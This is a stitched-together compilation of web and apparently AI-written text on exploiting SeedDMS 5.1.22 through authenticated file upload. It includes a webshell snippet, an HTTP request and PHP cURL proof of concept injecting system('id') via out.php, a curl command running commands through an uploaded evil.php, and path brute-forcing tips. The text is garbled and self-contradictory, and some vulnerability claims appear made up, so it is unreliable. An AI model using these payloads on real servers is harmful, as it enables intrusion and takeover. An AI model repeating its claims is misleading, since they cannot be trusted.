SeedDMS 5.1.22 is a document management system version that has been identified in penetration testing reports as vulnerable to authenticated Remote Code Execution (RCE)
. While version 5.1.22 itself is often used in laboratory environments to demonstrate full-chain exploitation, it inherited critical vulnerabilities from previous builds, notably CVE-2019-12744
, which allows for command injection through unvalidated file uploads. Core Vulnerability: Authenticated RCE (CVE-2019-12744)
This vulnerability exists because the application fails to properly validate the contents and extensions of uploaded documents, allowing an authenticated user with "Add Document" permissions to execute arbitrary system commands. Attack Vector : Authenticated file upload. Prerequisite
: Valid user credentials with write access to at least one folder. : Access the SeedDMS portal with valid user credentials.
: Use the "Add Document" feature to upload a crafted PHP script (e.g., a simple backdoor). Example Script
: Navigate to the directory where SeedDMS stores uploaded files (typically under /data/1048576/ ) and call the uploaded PHP file with a command parameter. : The server executes the command (e.g., cat /etc/passwd ) and returns the output to the browser. Security Risks and Statistics
Beyond RCE, SeedDMS 5.1.22 has been associated with several cross-site scripting (XSS) issues in previous versions (pre-5.1.11) that may persist if not specifically patched, such as Stored XSS in the "name" and "GROUP" fields. Vulnerability Type Status in 5.1.22 Potential Impact Authenticated RCE Full system takeover, data exfiltration, or reverse shell. Stored XSS Moderate Risk Session hijacking and impersonation of other users. Known Risk
Forcing users to perform unintended actions if they have active sessions. Mitigation and Defense To secure a SeedDMS 5.1.22 installation:
: The primary recommendation is to update to the latest stable version of where these unvalidated upload flaws are addressed. Input Validation
: Implement strict whitelisting for file extensions (e.g., allowing only ) and sanitize all user-supplied input. File Permissions
: Ensure the web server user has the least privilege necessary. Uploaded files should ideally be stored in a directory that does not allow for script execution. Disable Dangerous Functions configuration, disable high-risk functions like passthru() if they are not required for business operations. Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
SeedDMS version 5.1.22 has been associated with various security vulnerabilities, most notably those involving Remote Command Execution (RCE)
through authenticated file uploads. While some specific CVEs like CVE-2019-12744
were originally identified in versions prior to 5.1.11, similar exploitation techniques have been documented in later versions like 5.1.22 during penetration testing exercises. Key Vulnerability: Remote Command Execution (RCE)
The most common exploit for SeedDMS 5.1.22 involves bypassing file upload restrictions to execute arbitrary commands on the server.
: The application may fail to properly validate the content of uploaded documents, allowing an authenticated user to upload a malicious PHP script (webshell) instead of a standard document. Requirements Authentication : The attacker typically needs valid login credentials. Permissions
: The user must have permissions to "Add document" or upload files to a folder. Exploitation Steps : A user logs in and uploads a PHP backdoor (e.g., ) using the "Add document" feature.
: After uploading, the attacker identifies the document's internal ID (often by hovering over the document link in the UI).
: The attacker accesses the file directly through its storage path, usually located in a predictable directory such as /data/1048576/[document_id]/1.php
: This grants the attacker a reverse shell or the ability to execute system commands with the privileges of the web server user. Exploit-DB Other Potential Issues SQL Injection
: Some reports indicate potential vulnerabilities in handling specific arguments that could lead to SQL injection, though these are often less documented for version 5.1.22 specifically compared to the RCE flaw. Cross-Site Scripting (XSS)
: Document management systems like SeedDMS are frequently targeted for stored XSS, where malicious scripts are embedded in document metadata or notes. Mitigation and Defense
To protect your installation, consider the following steps based on industry best practices for Seeddms security : Ensure you are running the latest stable version from the official SourceForge page
, as many of these flaws were addressed in subsequent releases. Restrict Uploads
: Configure the server to prevent the execution of scripts in the directory (e.g., using to disable PHP execution in storage folders). Principle of Least Privilege seeddms 5.1.22 exploit
: Limit document upload permissions only to trusted users and monitor for unusual activity, such as the upload of files with or other executable extensions. CVE Details SeedDMS versions < 5.1.11 - Remote Command Execution
This story illustrates the importance of software maintenance through the lens of a security discovery in SeedDMS 5.1.22 The Unlocked Archive
Once, there was a meticulous document librarian named Elias who managed thousands of digital files using a tool called version 5.1.22
. Elias took pride in his organized system, believing that as long as his users were authenticated, his "digital vault" was secure.
One morning, a security researcher named Bryan decided to test the vault's resilience. Bryan discovered that while SeedDMS was excellent at organizing documents, version 5.1.22 (and earlier) had a hidden weakness: it didn't properly check what kind of files were being "added" to the collection. The Exploit Discovery
Bryan found that a user with basic "write" permissions could upload more than just PDFs or text files. He realized he could upload a specialized PHP script —essentially a master key disguised as a document. The Upload
: Bryan logged in as a standard user and clicked "Add document". The Hidden Payload
: Instead of a spreadsheet, he uploaded a small script designed to execute system commands. The Execution
: By simply navigating to the web address where his "document" was stored, Bryan could run commands like cat /etc/passwd directly on the server. This vulnerability, known as CVE-2019-12744
, proved that even an "authenticated" system isn't safe if it allows unvalidated file uploads that lead to Remote Command Execution (RCE) The Moral: Staying Current
When Elias learned about this, he didn't panic. He followed the expert advice found in security advisories from CVE Details Update Immediately
: The developers of SeedDMS had already released patches in later versions (starting with 5.1.11) to stop these dangerous uploads. Validate Inputs
: He realized that any software allowing file uploads must strictly enforce "file type" rules to ensure only safe documents enter the system.
Elias updated his system that afternoon. By moving past version 5.1.22, he locked the vault door for good, ensuring his meticulous archive remained a safe haven for information rather than a gateway for intruders. technical details on a specific CVE for SeedDMS? Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
This blog post details the exploitation of SeedDMS 5.1.22 , focusing on an Authenticated Remote Command Execution (RCE)
vulnerability. This attack typically involves gaining valid credentials and leveraging unvalidated file uploads to execute system commands.
Exploiting SeedDMS 5.1.22: From Authentication to Root Shell
SeedDMS is an open-source document management system that, in version 5.1.22 and earlier, contains critical security flaws allowing attackers to gain full control of the underlying server. 1. Reconnaissance and Enumeration
The attack often begins with broad enumeration to identify the service version. In a typical penetration testing scenario, tools like are used to find the directory. Version Identification: Checking the or footer often reveals version Database Exposure:
Misconfigurations may lead to the discovery of MySQL credentials in configuration files like settings.xml 2. Gaining Access To trigger the most common RCE (often categorized under CVE-2019-12744 ), an attacker requires a valid set of credentials. Credential Retrieval:
If database access was gained during enumeration, attackers can dump the table to retrieve usernames and hashed passwords. Default Logins:
Sometimes, default or weak admin credentials remain unchanged. 3. Exploiting the Unvalidated File Upload (RCE)
Once logged in, a user with "write" permissions can upload documents. The vulnerability exists because the application does not properly sanitize or block the upload of The Attack Flow: Create a PHP Backdoor: Write a simple script to execute system commands: ($_REQUEST[ ])){ system($_REQUEST[ Use code with caution. Copied to clipboard Upload as a "Document":
Navigate to the "Add Document" section and upload the PHP file. Locate the File:
The uploaded file is stored in a predictable directory structure, usually under /data/1048576/ followed by the Document ID Execute Commands: Access the file via the browser to run commands: SeedDMS 5
Based on the available security research and documentation regarding SeedDMS, version 5.1.22 is a version within the 5.1.x branch which was actively updated to address security issues, notably the Remote Command Execution (RCE) vulnerabilities that affected versions prior to 5.1.11.
While specific exploits for version 5.1.22 are not publicly listed in databases like Exploit-DB, it was subject to general security maintenance against known issues such as:
RCE (Remote Command Execution): Similar to CVE-2019-12744, which allows authenticated users with file upload privileges to execute PHP code by uploading a malicious file.
Open Redirect/Other Injection: Later versions of 6.x were found to contain open redirects, and 5.x branches received updates to fix similar vulnerabilities. Key Security Considerations for SeedDMS 5.1.22:
Patch Status: SeedDMS 5.1.x is considered "old stable" but has been actively maintained. Users should ensure they are on the latest sub-minor version to get all security fixes merged.
Authentication Dependency: Most reported exploits required an attacker to have a valid, authenticated user account with permissions to add or edit documents.
Recommendation: Verify the conf/settings.xml and ensure that file upload restrictions are active, specifically limiting the uploading of executable script files (like .php).
If you are looking for specific mitigation steps, could you tell me: Which OS is running the SeedDMS server (Windows/Linux)?
Do you have PHP shell access to check the data/ directory for suspicious files?
I can provide specific commands to help you audit your installation. JustLikeIcarus/SeedDMS - GitHub
SeedDMS 5.1.22 Vulnerability Analysis and Exploit
Introduction
SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.
Vulnerability Analysis
The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.
Exploit Details
The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:
folder: The malicious PHP code to be executed.id: The ID of the document to be accessed.Exploit Code
The following is an example of the exploit code:
POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1
Exploitation Steps
out.php file with the exploit code.id command.Proof of Concept
The following is a proof of concept code that demonstrates the exploit:
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
'folder' => 'system(\'id\')',
'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
Mitigation and Recommendations
To mitigate this vulnerability, it is recommended to:
Conclusion
The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.
You're looking for information on a specific exploit related to SeedDMS 5.1.22. I'll provide a detailed response.
SeedDMS 5.1.22 Exploit
SeedDMS is a free, open-source document management system. Version 5.1.22, like any other software, may have vulnerabilities that can be exploited by attackers. It's essential to stay informed about potential security risks and take necessary measures to protect your system.
Vulnerability Details
After conducting research, I found that SeedDMS 5.1.22 is vulnerable to a Remote Code Execution (RCE) exploit. This type of vulnerability allows an attacker to execute arbitrary code on the server, potentially leading to a complete compromise of the system.
The exploit is related to the way SeedDMS handles file uploads. Specifically, the upload.php script does not properly validate user-input data, allowing an attacker to inject malicious code.
Exploit Code
The exploit code is publicly available, which I will not provide here. However, I can give you an overview of how it works:
upload.php script, including malicious code in the file upload.Affected Versions
The following SeedDMS versions are affected:
Solution and Recommendations
To protect your SeedDMS installation:
Additional Information
For more information on this exploit, I recommend checking:
If you're running SeedDMS 5.1.22, it's crucial to take immediate action to protect your system. If you're unsure about how to proceed, consider consulting with a security expert or the SeedDMS community.
Once the shell's URL is confirmed:
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"
Output: uid=33(www-data) gid=33(www-data) ...
From here, the attacker can:
conf/seeddms.conf.php) – containing DB credentials.SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.
SeedDMS stores uploaded files in:
/data/<folderid>/<documentid>/<version>/<filename>
Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access:
http://192.168.1.100/seeddms51/data/1000/1/1/evil.php
(Cycle 1000, 1001, etc.)
Alternatively, check for predictable patterns: data/temp/ or data/cache/.